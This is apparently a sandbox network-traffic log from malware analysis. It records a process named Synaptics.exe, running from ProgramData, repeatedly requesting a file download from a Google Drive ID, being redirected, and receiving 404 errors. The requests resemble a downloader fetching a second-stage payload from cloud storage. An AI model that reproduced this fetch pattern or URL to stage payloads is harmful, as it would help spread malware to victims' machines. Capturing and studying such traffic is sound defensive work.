                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:43 UTC | 1390 | IN
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="K3ir4MkTY8JyQESVkiRWqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:43 UTC | 122 | IN
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.9 | 49815 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
2024-12-30 10:25:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-utWVECkj1uTa91EC1oBS4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.9 | 49816 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:44 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6HjS2LZhbcGPSGowaIXzbvS8zp4gPuvoQKlvUQ23kkfXHyIJnqznf9M1CXb5K5ENDs2IFV7EQ
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HjljMUQ8JXEj-YAHg7kWKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:44 UTC | 140 | IN
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:44 UTC | 1390 | IN
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="sh4RSBxbT2xZvPtHwRIrqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:44 UTC | 122 | IN
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.9 | 49817 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
2024-12-30 10:25:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d0qeCqC4OAoDoWnq55pGsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.9 | 49818 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7RU4jWpoOyq_fvQkvx9X4v_z6GEQ9DAelptv-f2qz1GSlQmX6vqFwkTqkqFDXKAd3Z
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lGU5AHtUqSZmJzuePf6TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:44 UTC | 147 | IN
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:44 UTC | 1390 | IN
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ODt7_5y3PkcBI0rbTpJcww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:44 UTC | 115 | IN
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.9 | 49821 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.9 | 49826 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-roxTaLCKx8ZZ68jcbBQZcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    65 | 192.168.2.9 | 49827 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xJNtITcHStBpIv08WYBLbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    66 | 192.168.2.9 | 49829 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HJ2vbwcFZc3BzjgTjOoZRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    67 | 192.168.2.9 | 49831 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ItJK-ERegMOP87RLcLy5tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    68 | 192.168.2.9 | 49830 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6c0TIrRIk97t1Jr611uUny5uSNuUGcyNuIlKJJeaJKY4IlmsnldZSc2kBN1i2n24Vk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xj94ZCwTsxwd-CI2ClAkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:47 UTC | 147 | IN
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:47 UTC | 1390 | IN
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ZlqbuqhV-czE66x8X_322w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:47 UTC | 115 | IN
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    69 | 192.168.2.9 | 49828 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7UJy_zeg5-NKA4jWQbWcGO8KUIvoCdJzPazZN9BF5w-N73znTyO2WAMErNBDPnjDc6
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
